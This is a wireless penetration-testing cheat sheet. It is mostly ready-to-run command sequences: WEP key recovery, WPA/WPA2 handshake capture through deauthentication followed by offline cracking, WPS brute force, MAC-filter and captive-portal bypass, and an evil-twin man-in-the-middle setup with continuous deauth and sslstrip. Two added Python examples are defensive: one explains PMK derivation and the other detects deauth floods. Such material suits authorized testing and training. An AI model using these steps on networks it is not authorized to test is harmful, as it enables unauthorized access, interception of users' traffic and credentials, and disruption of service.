Wireless Penetration Testing Cheat Sheet

Mar 3rd, 2025
Current Date - March 03, 2025

Note - Commands assume a Linux environment (e.g., Kali Linux) with tools such as aircrack-ng, reaver, pyrit and hashcat installed. Replace wlan0/wlan0mon with your wireless interface. Ensure your adapter supports monitor mode and packet injection (e.g., Alfa AWUS036NHA).

PREPARATION

Verify Wireless Interface
Check available interfaces
iwconfig

Kill interfering processes (network managers and supplicants)
airmon-ng check kill

Verify adapter capabilities (look for "monitor" under the supported interface modes)
iw list

Enable Monitor Mode
ifconfig wlan0 down
airmon-ng start wlan0
Confirm that wlan0mon has been created
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up

Increase Wi-Fi TX Power (Optional)
Set regulatory domain (e.g., Bolivia for higher power)
iw reg set BO
Adjust TX power (maximum varies by adapter and country); 30 dBm if supported
iwconfig wlan0mon txpower 30
Verify
iwconfig

Change Wi-Fi Channel
Set a specific channel (1-14 for 2.4 GHz, higher numbers for 5 GHz)
iwconfig wlan0mon channel <Channel>

WIRELESS RECONNAISSANCE

Scan for Networks
Broad scan (all channels; add --band abg to hop the 5 GHz channels as well as 2.4 GHz)
airodump-ng wlan0mon

Targeted scan (specific AP)
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
Output is saved as <FileName>-01.cap (PCAP format)
Note the encryption type (WEP/WPA/WPA2/WPA3)

Find Hidden SSID
Deauthenticate clients; the SSID is revealed when they reconnect
airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon
Watch airodump-ng for the SSID to appear

Identify Victim MAC
From the airodump-ng output, note the client MAC under the "STATION" column
Prefer active clients with a strong signal

WEP CRACKING

Method 1 - Fake Authentication Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
Check your MAC
macchanger --show wlan0mon
aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <FileName>-01.cap

Method 2 - ARP Replay Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
macchanger --show wlan0mon
aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <FileName>-01.cap

Method 3 - Chop Chop Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
When prompted, press 'y' to use the packet; the recovered keystream is written to replay_dec-<timestamp>.xor
packetforge-ng -0 -a <BSSID> -h <OurMac> -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-<timestamp>.xor -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <FileName>-01.cap

Method 4 - Fragmentation Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -5 -b <BSSID> -h <OurMac> wlan0mon
Press 'y' when prompted; the recovered keystream is written to fragment-<timestamp>.xor
packetforge-ng -0 -a <BSSID> -h <OurMac> -k 255.255.255.255 -l 255.255.255.255 -y fragment-<timestamp>.xor -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <FileName>-01.cap

Method 5 - SKA (Shared Key Authentication) Cracking
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
aircrack-ng <FileName>-01.cap

WPA/WPA2 CRACKING

Method 1 - WPS Attack
Check for WPS-enabled APs
wash -i wlan0mon -C
Crack WPS
reaver -i wlan0mon -b <BSSID> -vv -S
Specific PIN attack (if known)
reaver -i wlan0mon -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Note - AP must support WPS; use --delay or --lock-delay if locked out

Method 2 - Dictionary Attack (aircrack-ng)
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
Deauthenticate a client to capture the 4-way handshake
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
aircrack-ng -w <WordlistFile> -b <BSSID> <FileName>-01.cap

Method 3 - Crack with Hashcat (Modern GPU Attack)
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
Deauthenticate a client to capture the 4-way handshake
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
Convert the capture to Hashcat's 22000 format (hcxpcapngtool is the converter in the hcxtools suite; the older hccapx format and mode 2500 are deprecated in current Hashcat)
hcxpcapngtool -o <FileName>.hc22000 <FileName>-01.cap
Crack with Hashcat (--force only masks driver warnings and should not be needed)
hashcat -m 22000 -a 0 <FileName>.hc22000 <WordlistFile>
Show cracked key
hashcat -m 22000 <FileName>.hc22000 --show

Method 4 - Crack with John The Ripper
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
Convert the capture to hccap, then to John's hash format (hccap2john ships with John the Ripper jumbo)
aircrack-ng <FileName>-01.cap -J <JohnFile>
hccap2john <JohnFile>.hccap > <JohnFile>.john
cd /pentest/passwords/john
./john --wordlist=<Wordlist> --rules <JohnFile>.john

Method 5 - Crack with coWPAtty
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
cowpatty -r <FileName>-01.cap -f <Wordlist> -s <ESSID>
Precompute hashes (faster cracking; the PMK table is bound to this ESSID)
genpmk -s <ESSID> -f <Wordlist> -d <HashesFileName>
cowpatty -r <FileName>-01.cap -d <HashesFileName> -s <ESSID>

Method 6 - Crack with Pyrit
Prerequisite - Install Pyrit with GPU support (apt-get install pyrit)
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
pyrit -r <FileName>-01.cap -b <BSSID> -i <Wordlist> attack_passthrough
Precompute database
pyrit -i <Wordlist> import_passwords
pyrit -e <ESSID> create_essid
pyrit batch
pyrit -r <FileName>-01.cap attack_db

Method 7 - Precomputed WPA Keys Database Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
echo "<ESSID>" > ESSID.txt
airolib-ng NEW_DB --import essid ESSID.txt
airolib-ng NEW_DB --import passwd <DictionaryFile>
airolib-ng NEW_DB --clean all
airolib-ng NEW_DB --batch
airolib-ng NEW_DB --stats
airolib-ng NEW_DB --verify all
aircrack-ng -r NEW_DB <FileName>-01.cap

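The precomputation steps in Methods 5 (genpmk), 6 (pyrit batch) and 7 (airolib-ng --batch) all rest on the same fact: the WPA/WPA2-Personal PMK is PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), so the ESSID is the salt and every table is tied to one ESSID. The following Python is an added example, not part of the original cheat sheet: it derives the PMK with the standard library, checks it against the IEEE 802.11i Annex H known-answer vector, and shows that a table built for a default ESSID misses a network with the same passphrase and a unique ESSID (the wordlist and ESSIDs are constructed).

```python
import hashlib
from typing import Dict, Iterable, Optional

# WPA/WPA2-Personal (IEEE 802.11i): PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32 bytes).
# The ESSID is the salt, which is why every precomputed table is tied to one ESSID.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """Return the 32-byte PMK for a passphrase/ESSID pair."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def build_pmk_table(essid: str, wordlist: Iterable[str]) -> Dict[bytes, str]:
    """Precompute PMK -> passphrase for one ESSID (what genpmk, pyrit batch and
    airolib-ng --batch do, paying the 4096 HMAC rounds once per word)."""
    return {derive_pmk(word, essid): word for word in wordlist}


def lookup_pmk(table: Dict[bytes, str], pmk: bytes) -> Optional[str]:
    """A table hit replaces the PBKDF2 work with a dictionary lookup."""
    return table.get(pmk)


# Known-answer test from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_TEST_PMK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def essid_binding_demo() -> Dict[str, Optional[str]]:
    """Constructed example: a table built for a default ESSID hits a network using that
    ESSID but misses a network with the same passphrase and a unique ESSID."""
    wordlist = ["password", "letmein1", "12345678"]             # constructed sample wordlist
    table = build_pmk_table("linksys", wordlist)
    return {
        "same_essid": lookup_pmk(table, derive_pmk("password", "linksys")),
        "unique_essid": lookup_pmk(table, derive_pmk("password", "Cafe-Guest-4F2A")),
    }


if __name__ == "__main__":
    assert derive_pmk("password", "IEEE") == IEEE_TEST_PMK
    print(essid_binding_demo())   # {'same_essid': 'password', 'unique_essid': None}
```

For defenders the takeaway is that a non-default ESSID defeats shared precomputed tables but not a per-target dictionary run, so passphrase length and randomness remain the effective control.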
WPA3 CONSIDERATIONS (Limited as of 2025)

Reconnaissance
Check for WPA3 with airodump-ng (shows "WPA3" or "SAE" in the encryption/authentication columns)

Dragonfly Handshake Attack
Capture handshake
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
Convert to Hashcat format
hcxpcapngtool -o <FileName>.hc22000 <FileName>-01.cap
Crack (requires strong GPU and wordlist)
hashcat -m 22000 -a 0 <FileName>.hc22000 <WordlistFile>

Note - WPA3 is resistant; success depends on weak passwords. SAE (Dragonfly) is designed so that a captured exchange does not yield an offline-crackable hash, and WPA3 requires Protected Management Frames, so clients ignore the unauthenticated deauth frames above. Hashcat mode 22000 only consumes WPA/WPA2 EAPOL or PMKID material, which is present only where the AP also serves WPA2 clients (transition mode).

BYPASS DEFENSES

Bypass MAC Filtering
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon

Bypass Open Network (Captive Portal)
Connect to the open AP
iwconfig wlan0 essid <ESSID>
dhclient wlan0
Spoof MAC if filtered
macchanger --mac <VictimMac> wlan0
Use a browser to pass the portal, or intercept credentials with the MITM setup below

MAN-IN-THE-MIDDLE (MITM) ATTACK
Prerequisite - Install bridge-utils (apt-get install bridge-utils)
airmon-ng start wlan0
Create the fake AP; this creates the at0 interface
airbase-ng -e "<FakeESSID>" wlan0mon
Bridge at0 to the wireless interface
brctl addbr mitm-bridge
brctl addif mitm-bridge wlan0mon
brctl addif mitm-bridge at0
ifconfig wlan0mon 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge up
Continuous deauth against the real AP
aireplay-ng --deauth 0 -a <VictimBSSID> wlan0mon
Get an IP from the real network
dhclient mitm-bridge &
Select the mitm-bridge interface in Wireshark
wireshark &
Optional - SSLstrip or intercept creds
sslstrip -l 8080 &

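The deauthentication bursts this sheet relies on (aireplay-ng -0 for handshake capture and hidden SSIDs, --deauth 0 in the MITM setup above) are unauthenticated management frames sent at a rate no legitimate AP produces, which makes them easy to spot from a monitor-mode capture. The following Python is an added example, not part of the original cheat sheet: it parses constructed raw 802.11 management frames, counts deauth/disassoc frames per BSSID in a one-second sliding window, and reports any BSSID that exceeds a threshold, the logic a WIDS sensor applies. Frame layout follows the standard 24-byte management header; the BSSIDs and timestamps are constructed.

```python
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# 802.11 frame control (little-endian u16): bits 0-1 version, 2-3 type, 4-7 subtype.
TYPE_MGMT, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0, 10, 12
MGMT_HDR = struct.Struct("<HH6s6s6sH")  # FC, duration, addr1, addr2, addr3, seq-ctl

def parse_mgmt_frame(frame: bytes) -> Optional[Tuple[int, bytes, bytes, bytes]]:
    """Return (subtype, addr1, addr2, addr3) for a management frame, else None."""
    if len(frame) < MGMT_HDR.size:
        return None
    fc, _dur, addr1, addr2, addr3, _seq = MGMT_HDR.unpack_from(frame)
    if (fc >> 2) & 0x3 != TYPE_MGMT:
        return None
    return (fc >> 4) & 0xF, addr1, addr2, addr3

def detect_deauth_flood(frames: List[Tuple[float, bytes]], window_s: float = 1.0,
                        threshold: int = 10) -> Dict[bytes, int]:
    """Sliding-window count of deauth/disassoc frames per BSSID (addr3); returns the
    peak count for every BSSID that exceeded the threshold inside one window."""
    recent: Dict[bytes, List[float]] = defaultdict(list)
    peaks: Dict[bytes, int] = {}
    for ts, frame in sorted(frames, key=lambda f: f[0]):
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        window = recent[parsed[3]]
        window.append(ts)
        while ts - window[0] > window_s:      # drop timestamps that left the window
            window.pop(0)
        if len(window) > threshold:
            peaks[parsed[3]] = max(peaks.get(parsed[3], 0), len(window))
    return peaks

def make_deauth(dst: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Constructed deauth frame: FC 0x00C0 (type 0, subtype 12), transmitter = BSSID."""
    return MGMT_HDR.pack(0x00C0, 0, dst, bssid, bssid, 0) + struct.pack("<H", reason)

def sample_capture() -> List[Tuple[float, bytes]]:
    """Constructed capture: one ordinary deauth from AP B, a 25-frame broadcast burst from AP A."""
    ap_a, ap_b = bytes.fromhex("021122334455"), bytes.fromhex("02aabbccddee")
    frames = [(0.5, make_deauth(bytes.fromhex("0200deadbeef"), ap_b, reason=3))]
    frames += [(10.0 + i * 0.02, make_deauth(b"\xff" * 6, ap_a)) for i in range(25)]
    return frames

if __name__ == "__main__":
    for bssid, peak in detect_deauth_flood(sample_capture()).items():
        print(f"deauth flood from {bssid.hex(':')}: {peak} frames within 1 s")
```

Enabling 802.11w (Protected Management Frames) on the AP and clients makes these forged frames ineffective; the detector still sees them, which is useful for locating the transmitter.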
POST-EXPLOITATION

Connect to Network (WEP)
ifconfig wlan0mon down
iwconfig wlan0 mode managed
ifconfig wlan0 up
iwconfig wlan0 essid <ESSID> key <CrackedKey>
dhclient wlan0

Connect to Network (WPA/WPA2)
ifconfig wlan0mon down
iwconfig wlan0 mode managed
ifconfig wlan0 up
wpa_passphrase <ESSID> <CrackedKey> > wpa.conf
wpa_supplicant -i wlan0 -c wpa.conf &
dhclient wlan0

Connect to Network (WPA3)
Same as WPA2, but add key_mgmt=SAE and ieee80211w=2 to the network block in wpa.conf (wpa_supplicant uses the psk line as the SAE password when sae_password is not set)

Cleanup
Stop monitor mode
airmon-ng stop wlan0mon
ifconfig wlan0 up
Restart the network manager (systemctl restart NetworkManager on systemd hosts)
service network-manager restart

TROUBLESHOOTING
Monitor mode fails - Verify that the adapter supports monitor mode (iw list)
No handshake captured - Increase the deauth count (-0 20) or target multiple clients
TX power not changing - Check the regulatory domain (iw reg get) and adapter specs
WPS locked - Adjust the reaver delay (--delay=5) or try later
Hashcat fails - Install GPU drivers (e.g., NVIDIA CUDA)